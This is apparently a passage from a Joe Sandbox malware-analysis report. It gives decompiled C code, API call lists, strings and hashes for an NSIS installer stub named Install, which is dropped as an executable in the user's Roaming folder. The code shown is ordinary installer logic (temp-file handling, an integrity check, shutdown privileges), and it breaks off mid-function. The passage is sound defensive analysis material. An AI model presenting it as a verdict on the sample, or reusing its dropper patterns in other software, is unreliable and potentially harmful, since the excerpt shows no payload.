                            												E00405B9D(_v8, 0x200010);
                            												ExitProcess(2);
                            											}
                            											if( *0x434f1c == _t188) {
                            												L51:
                            												 *0x434fac =  *0x434fac | 0xffffffff;
                            												_v24 = E00403BEC(_t264);
                            												goto L68;
                            											}
                            											_t218 = E00405E39(0x440000, _t188);
                            											if(_t218 < 0x440000) {
                            												L48:
                            												_t263 = _t218 - 0x440000;
                            												_v8 = L"Error launching installer";
                            												if(_t218 < 0x440000) {
                            													_t189 = E00405B08(__eflags);
                            													lstrcatW(_t234, L"~nsu");
                            													__eflags = _t189;
                            													if(_t189 != 0) {
                            														lstrcatW(_t234, "A");
                            													}
                            													lstrcatW(_t234, L".tmp");
                            													_t137 = lstrcmpiW(_t234, 0x441800);
                            													__eflags = _t137;
                            													if(_t137 == 0) {
                            														L67:
                            														_t188 = 0;
                            														__eflags = 0;
                            														goto L68;
                            													} else {
                            														__eflags = _t189;
                            														_push(_t234);
                            														if(_t189 == 0) {
                            															E00405AEB();
                            														} else {
                            															E00405A6E();
                            														}
                            														SetCurrentDirectoryW(_t234);
                            														__eflags =  *0x440800;
                            														if( *0x440800 == 0) {
                            															E0040653D(0x440800, 0x441800);
                            														}
                            														E0040653D(0x436000, _v16);
                            														_t201 = "A" & 0x0000ffff;
                            														_t143 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                            														__eflags = _t143;
                            														_v12 = 0x1a;
                            														 *0x436800 = _t143;
                            														do {
                            															E0040657A(0, 0x42aa28, _t234, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                            															DeleteFileW(0x42aa28);
                            															__eflags = _v8;
                            															if(_v8 != 0) {
                            																_t148 = CopyFileW(0x443800, 0x42aa28, 1);
                            																__eflags = _t148;
                            																if(_t148 != 0) {
                            																	E004062FD(_t201, 0x42aa28, 0);
                            																	E0040657A(0, 0x42aa28, _t234, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                            																	_t152 = E00405B20(0x42aa28);
                            																	__eflags = _t152;
                            																	if(_t152 != 0) {
                            																		CloseHandle(_t152);
                            																		_v8 = 0;
                            																	}
                            																}
                            															}
                            															 *0x436800 =  *0x436800 + 1;
                            															_t61 =  &_v12;
                            															 *_t61 = _v12 - 1;
                            															__eflags =  *_t61;
                            														} while ( *_t61 != 0);
                            														E004062FD(_t201, _t234, 0);
                            														goto L67;
                            													}
                            												}
                            												 *_t218 = _t188;
                            												_t221 =  &(_t218[2]);
                            												_t157 = E00405F14(_t263,  &(_t218[2]));
                            												_t264 = _t157;
                            												if(_t157 == 0) {
                            													goto L68;
                            												}
                            												E0040653D(0x440800, _t221);
                            												E0040653D(0x441000, _t221);
                            												_v8 = _t188;
                            												goto L51;
                            											}
                            											asm("cdq");
                            											asm("cdq");
                            											asm("cdq");
                            											_t204 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                            											_t167 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                            											while( *_t218 != _t204 || _t218[1] != _t167) {
                            												_t218 = _t218;
                            												if(_t218 >= 0x440000) {
                            													continue;
                            												}
                            												break;
                            											}
                            											_t188 = 0;
                            											goto L48;
                            										}
                            										GetWindowsDirectoryW(_t234, 0x3fb);
                            										lstrcatW(_t234, L"\\Temp");
                            										_t170 = E004034FC(_t198, _t252);
                            										_t253 = _t170;
                            										if(_t170 != 0) {
                            											goto L40;
                            										}
                            										GetTempPathW(0x3fc, _t234);
                            										lstrcatW(_t234, L"Low");
                            										SetEnvironmentVariableW(L"TEMP", _t234);
                            										SetEnvironmentVariableW(L"TMP", _t234);
                            										_t175 = E004034FC(_t198, _t253);
                            										_t254 = _t175;
                            										if(_t175 == 0) {
                            											goto L68;
                            										}
                            										goto L40;
                            									}
                            									goto L31;
                            								}
                            								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                            								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                            									goto L29;
                            								}
                            								_t177 =  *((intOrPtr*)(_t198 + 8));
                            								__eflags = _t177 - 0x20;
                            								if(_t177 == 0x20) {
                            									L28:
                            									_t36 =  &_v20;
                            									 *_t36 = _v20 | 0x00000004;
                            									__eflags =  *_t36;
                            									goto L29;
                            								}
                            								__eflags = _t177 - _t188;
                            								if(_t177 != _t188) {
                            									goto L29;
                            								}
                            								goto L28;
                            							}
                            							_t178 =  *((intOrPtr*)(_t198 + 2));
                            							__eflags = _t178 - _t209;
                            							if(_t178 == _t209) {
                            								L23:
                            								 *0x434fa0 = 1;
                            								goto L24;
                            							}
                            							__eflags = _t178 - _t188;
                            							if(_t178 != _t188) {
                            								goto L24;
                            							}
                            							goto L23;
                            						}
                            					} else {
                            						goto L16;
                            					}
                            					do {
                            						L16:
                            						_t198 = _t198 + 2;
                            						__eflags =  *_t198 - _t209;
                            					} while ( *_t198 == _t209);
                            					goto L17;
                            				}
                            				goto L37;
                            			}
                            [Instruction address column for the decompiled function above, range 0x0040353b to 0x00403b0c; the per-statement alignment did not survive extraction.]

                            APIs
                            • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                            • GetVersionExW.KERNEL32(?), ref: 00403579
                            • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                            • OleInitialize.OLE32(00000000), ref: 0040366A
                            • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                            • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                            • CharNextW.USER32(00000000,00440000,00000020,00440000,00000000), ref: 004036D6
                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                            • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                              • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00440000,00000000,?), ref: 0040397C
                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                            • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                            • CopyFileW.KERNEL32(00443800,0042AA28,00000001), ref: 00403A0E
                            • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                            • ExitProcess.KERNEL32(?), ref: 00403A59
                            • OleUninitialize.OLE32(?), ref: 00403A5E
                            • ExitProcess.KERNEL32 ref: 00403A78
                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                            • ExitWindowsEx.USER32 ref: 00403AEB
                            • ExitProcess.KERNEL32 ref: 00403B0C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                            • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                            • API String ID: 2292928366-3502547859
                            • Opcode ID: fb71d40aeaad878488c5369afe35c68a3abfd82b90a6d5950651ba49b90856e7
                            • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                            • Opcode Fuzzy Hash: fb71d40aeaad878488c5369afe35c68a3abfd82b90a6d5950651ba49b90856e7
                            • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 96%
                            			E00403BEC(void* __eflags) {
                            				intOrPtr _v4;
                            				intOrPtr _v8;
                            				int _v12;
                            				void _v16;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr* _t22;
                            				void* _t30;
                            				void* _t32;
                            				int _t33;
                            				void* _t36;
                            				int _t39;
                            				int _t40;
                            				int _t44;
                            				short _t63;
                            				WCHAR* _t65;
                            				signed char _t69;
                            				signed short _t73;
                            				WCHAR* _t76;
                            				intOrPtr _t82;
                            				WCHAR* _t87;
                            
                            				_t82 =  *0x434f10;
                            				_t22 = E0040690A(2);
                            				_t90 = _t22;
                            				if(_t22 == 0) {
                            					_t76 = 0x42d268;
                            					L"1033" = 0x30;
                            					 *0x442002 = 0x78;
                            					 *0x442004 = 0;
                            					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                            					__eflags =  *0x42d268;
                            					if(__eflags == 0) {
                            						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                            					}
                            					lstrcatW(L"1033", _t76);
                            				} else {
                            					_t73 =  *_t22(); // executed
                            					E00406484(L"1033", _t73 & 0x0000ffff);
                            				}
                            				E00403EC2(_t78, _t90);
                            				 *0x434f80 =  *0x434f18 & 0x00000020;
                            				 *0x434f9c = 0x10000;
                            				if(E00405F14(_t90, 0x440800) != 0) {
                            					L16:
                            					if(E00405F14(_t98, 0x440800) == 0) {
                            						E0040657A(_t76, 0, _t82, 0x440800,  *((intOrPtr*)(_t82 + 0x118)));
                            					}
                            					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
                            					 *0x433ee8 = _t30;
                            					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                            						L21:
                            						if(E0040140B(0) == 0) {
                            							_t32 = E00403EC2(_t78, __eflags);
                            							__eflags =  *0x434fa0;
                            							if( *0x434fa0 != 0) {
                            								_t33 = E00405672(_t32, 0);
                            								__eflags = _t33;
                            								if(_t33 == 0) {
                            									E0040140B(1);
                            									goto L33;
                            								}
                            								__eflags =  *0x433ecc;
                            								if( *0x433ecc == 0) {
                            									E0040140B(2);
                            								}
                            								goto L22;
                            							}
                            							ShowWindow( *0x42d248, 5);
                            							_t39 = E0040689A("RichEd20");
                            							__eflags = _t39;
                            							if(_t39 == 0) {
                            								E0040689A("RichEd32");
                            							}
                            							_t87 = L"RichEdit20W";
                            							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                            							__eflags = _t40;
                            							if(_t40 == 0) {
                            								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                            								 *0x433ec4 = _t87;
                            								RegisterClassW(0x433ea0);
                            							}
                            							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0);
                            							E00403B3C(E0040140B(5), 1);
                            							return _t44;
                            						}
                            						L22:
                            						_t36 = 2;
                            						return _t36;
                            					} else {
                            						_t78 =  *0x434f00;
                            						 *0x433ea4 = E00401000;
                            						 *0x433eb0 =  *0x434f00;
                            						 *0x433eb4 = _t30;
                            						 *0x433ec4 = 0x40a380;
                            						if(RegisterClassW(0x433ea0) == 0) {
                            							L33:
                            							__eflags = 0;
                            							return 0;
                            						}
                            						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                            						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                            						goto L21;
                            					}
                            				} else {
                            					_t78 =  *(_t82 + 0x48);
                            					_t92 = _t78;
                            					if(_t78 == 0) {
                            						goto L16;
                            					}
                            					_t76 = 0x432ea0;
                            					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                            					_t63 =  *0x432ea0; // 0x43
                            					if(_t63 == 0) {
                            						goto L16;
                            					}
                            					if(_t63 == 0x22) {
                            						_t76 = 0x432ea2;
                            						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                            					}
                            					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                            					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                            						L15:
                            						E0040653D(0x440800, E00405E0C(_t76));
                            						goto L16;
                            					} else {
                            						_t69 = GetFileAttributesW(_t76);
                            						if(_t69 == 0xffffffff) {
                            							L14:
                            							E00405E58(_t76);
                            							goto L15;
                            						}
                            						_t98 = _t69 & 0x00000010;
                            						if((_t69 & 0x00000010) != 0) {
                            							goto L15;
                            						}
                            						goto L14;
                            					}
                            				}
                            			}

                            APIs
                              • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                              • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                            • GetUserDefaultUILanguage.KERNELBASE(00000002,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403C06
                              • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                            • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,?,?,?,C:\Users\user\AppData\Roaming\34432.exe,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76CDFAA0), ref: 00403CED
                            • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Roaming\34432.exe,?,?,?,C:\Users\user\AppData\Roaming\34432.exe,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                            • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,?,00000000,?), ref: 00403D0B
                            • LoadImageW.USER32 ref: 00403D54
                            • RegisterClassW.USER32 ref: 00403D91
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                            • CreateWindowExW.USER32 ref: 00403DDE
                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                            • GetClassInfoW.USER32 ref: 00403E40
                            • GetClassInfoW.USER32 ref: 00403E4D
                            • RegisterClassW.USER32 ref: 00403E56
                            • DialogBoxParamW.USER32 ref: 00403E75
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\34432.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                            • API String ID: 606308-2598761042
                            • Opcode ID: 5a24b6ccf2dff8f69514c8993659dfa0179b66eb04d645246d0b4e575a356aee
                            • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                            • Opcode Fuzzy Hash: 5a24b6ccf2dff8f69514c8993659dfa0179b66eb04d645246d0b4e575a356aee
                            • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 80%
                            			E0040307D(void* __eflags, signed int _a4) {
                            				DWORD* _v8;
                            				DWORD* _v12;
                            				void* _v16;
                            				intOrPtr _v20;
                            				char _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				intOrPtr _v40;
                            				signed int _v44;
                            				signed int _t50;
                            				void* _t53;
                            				void* _t57;
                            				intOrPtr* _t59;
                            				long _t60;
                            				signed int _t65;
                            				signed int _t70;
                            				signed int _t71;
                            				signed int _t77;
                            				intOrPtr _t80;
                            				long _t82;
                            				signed int _t85;
                            				signed int _t87;
                            				void* _t89;
                            				signed int _t90;
                            				signed int _t93;
                            				void* _t94;
                            
                            				_t82 = 0;
                            				_v12 = 0;
                            				_v8 = 0;
                            				 *0x434f0c = GetTickCount() + 0x3e8;
                            				GetModuleFileNameW(0, 0x443800, 0x400);
                            				_t89 = E0040602D(0x443800, 0x80000000, 3);
                            				_v16 = _t89;
                            				 *0x40a018 = _t89;
                            				if(_t89 == 0xffffffff) {
                            					return L"Error launching installer";
                            				}
                            				E0040653D(0x441800, 0x443800);
                            				E0040653D(0x444000, E00405E58(0x441800));
                            				_t50 = GetFileSize(_t89, 0);
                            				__eflags = _t50;
                            				 *0x42aa24 = _t50;
                            				_t93 = _t50;
                            				if(_t50 <= 0) {
                            					L24:
                            					E00403019(1);
                            					__eflags =  *0x434f14 - _t82;
                            					if( *0x434f14 == _t82) {
                            						goto L29;
                            					}
                            					__eflags = _v8 - _t82;
                            					if(_v8 == _t82) {
                            						L28:
                            						_t34 =  &_v24; // 0x40387d
                            						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                            						_t94 = _t53;
                            						E004034E5( *0x434f14 + 0x1c);
                            						_t35 =  &_v24; // 0x40387d
                            						_push( *_t35);
                            						_push(_t94);
                            						_push(_t82);
                            						_push(0xffffffff); // executed
                            						_t57 = E004032B4(); // executed
                            						__eflags = _t57 - _v24;
                            						if(_t57 == _v24) {
                            							__eflags = _v44 & 0x00000001;
                            							 *0x434f10 = _t94;
                            							 *0x434f18 =  *_t94;
                            							if((_v44 & 0x00000001) != 0) {
                            								 *0x434f1c =  *0x434f1c + 1;
                            								__eflags =  *0x434f1c;
                            							}
                            							_t40 = _t94 + 0x44; // 0x44
                            							_t59 = _t40;
                            							_t85 = 8;
                            							do {
                            								_t59 = _t59 - 8;
                            								 *_t59 =  *_t59 + _t94;
                            								_t85 = _t85 - 1;
                            								__eflags = _t85;
                            							} while (_t85 != 0);
                            							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                            							 *(_t94 + 0x3c) = _t60;
                            							E00405FE8(0x434f20, _t94 + 4, 0x40);
                            							__eflags = 0;
                            							return 0;
                            						}
                            						goto L29;
                            					}
                            					E004034E5( *0x41ea18);
                            					_t65 = E004034CF( &_a4, 4);
                            					__eflags = _t65;
                            					if(_t65 == 0) {
                            						goto L29;
                            					}
                            					__eflags = _v12 - _a4;
                            					if(_v12 != _a4) {
                            						goto L29;
                            					}
                            					goto L28;
                            				} else {
                            					do {
                            						_t90 = _t93;
                            						asm("sbb eax, eax");
                            						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                            						__eflags = _t93 - _t70;
                            						if(_t93 >= _t70) {
                            							_t90 = _t70;
                            						}
                            						_t71 = E004034CF(0x416a18, _t90);
                            						__eflags = _t71;
                            						if(_t71 == 0) {
                            							E00403019(1);
                            							L29:
                            							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                            						}
                            						__eflags =  *0x434f14;
                            						if( *0x434f14 != 0) {
                            							__eflags = _a4 & 0x00000002;
                            							if((_a4 & 0x00000002) == 0) {
                            								E00403019(0);
                            							}
                            							goto L20;
                            						}
                            						E00405FE8( &_v44, 0x416a18, 0x1c);
                            						_t77 = _v44;
                            						__eflags = _t77 & 0xfffffff0;
                            						if((_t77 & 0xfffffff0) != 0) {
                            							goto L20;
                            						}
                            						__eflags = _v40 - 0xdeadbeef;
                            						if(_v40 != 0xdeadbeef) {
                            							goto L20;
                            						}
                            						__eflags = _v28 - 0x74736e49;
                            						if(_v28 != 0x74736e49) {
                            							goto L20;
                            						}
                            						__eflags = _v32 - 0x74666f73;
                            						if(_v32 != 0x74666f73) {
                            							goto L20;
                            						}
                            						__eflags = _v36 - 0x6c6c754e;
                            						if(_v36 != 0x6c6c754e) {
                            							goto L20;
                            						}
                            						_a4 = _a4 | _t77;
                            						_t87 =  *0x41ea18; // 0x47ed1b
                            						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                            						_t80 = _v20;
                            						__eflags = _t80 - _t93;
                            						 *0x434f14 = _t87;
                            						if(_t80 > _t93) {
                            							goto L29;
                            						}
                            						__eflags = _a4 & 0x00000008;
                            						if((_a4 & 0x00000008) != 0) {
                            							L16:
                            							_v8 = _v8 + 1;
                            							_t93 = _t80 - 4;
                            							__eflags = _t90 - _t93;
                            							if(_t90 > _t93) {
                            								_t90 = _t93;
                            							}
                            							goto L20;
                            						}
                            						__eflags = _a4 & 0x00000004;
                            						if((_a4 & 0x00000004) != 0) {
                            							break;
                            						}
                            						goto L16;
                            						L20:
                            						__eflags = _t93 -  *0x42aa24; // 0x47ed1f
                            						if(__eflags < 0) {
                            							_v12 = E004069F7(_v12, 0x416a18, _t90);
                            						}
                            						 *0x41ea18 =  *0x41ea18 + _t90;
                            						_t93 = _t93 - _t90;
                            						__eflags = _t93;
                            					} while (_t93 != 0);
                            					_t82 = 0;
                            					__eflags = 0;
                            					goto L24;
                            				}
                            			}

                            APIs
                            • GetTickCount.KERNEL32 ref: 0040308E
                            • GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                              • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                              • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                            • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                            • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                            Strings
                            • Null, xrefs: 00403174
                            • Inst, xrefs: 00403162
                            • }8@, xrefs: 00403227, 00403242
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
                            • Error launching installer, xrefs: 004030CD
                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
                            • soft, xrefs: 0040316B
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                            • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                            • API String ID: 2803837635-3397361934
                            • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                            • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                            • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                            • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 281 40657a-406585 282 406587-406596 281->282 283 406598-4065ae 281->283 282->283 284 4065b0-4065bd 283->284 285 4065c6-4065cf 283->285 284->285 286 4065bf-4065c2 284->286 287 4065d5 285->287 288 4067aa-4067b5 285->288 286->285 289 4065da-4065e7 287->289 290 4067c0-4067c1 288->290 291 4067b7-4067bb call 40653d 288->291 289->288 292 4065ed-4065f6 289->292 291->290 294 406788 292->294 295 4065fc-406639 292->295 298 406796-406799 294->298 299 40678a-406794 294->299 296 40672c-406731 295->296 297 40663f-406646 295->297 303 406733-406739 296->303 304 406764-406769 296->304 300 406648-40664a 297->300 301 40664b-40664d 297->301 302 40679b-4067a4 298->302 299->302 300->301 305 40668a-40668d 301->305 306 40664f-406676 call 40640b 301->306 302->288 309 4065d7 302->309 310 406749-406755 call 40653d 303->310 311 40673b-406747 call 406484 303->311 307 406778-406786 lstrlenW 304->307 308 40676b-406773 call 40657a 304->308 315 40669d-4066a0 305->315 316 40668f-40669b GetSystemDirectoryW 305->316 326 406713-406717 306->326 327 40667c-406685 call 40657a 306->327 307->302 308->307 309->289 319 40675a-406760 310->319 311->319 322 4066a2-4066b0 GetWindowsDirectoryW 315->322 323 406709-40670b 315->323 321 40670d-406711 316->321 319->307 324 406762 319->324 321->326 328 406724-40672a call 4067c4 321->328 322->323 323->321 325 4066b2-4066ba 323->325 324->328 332 4066d1-4066e7 SHGetSpecialFolderLocation 325->332 333 4066bc-4066c5 325->333 326->328 329 406719-40671f lstrcatW 326->329 327->321 328->307 329->328 334 406705 332->334 335 4066e9-406703 SHGetPathFromIDListW CoTaskMemFree 332->335 338 4066cd-4066cf 333->338 334->323 335->321 335->334 338->321 338->332
                            C-Code - Quality: 72%
                            			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                            				struct _ITEMIDLIST* _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				signed int _t44;
                            				WCHAR* _t45;
                            				signed char _t47;
                            				signed int _t48;
                            				short _t59;
                            				short _t61;
                            				short _t63;
                            				void* _t71;
                            				signed int _t77;
                            				signed int _t78;
                            				short _t81;
                            				short _t82;
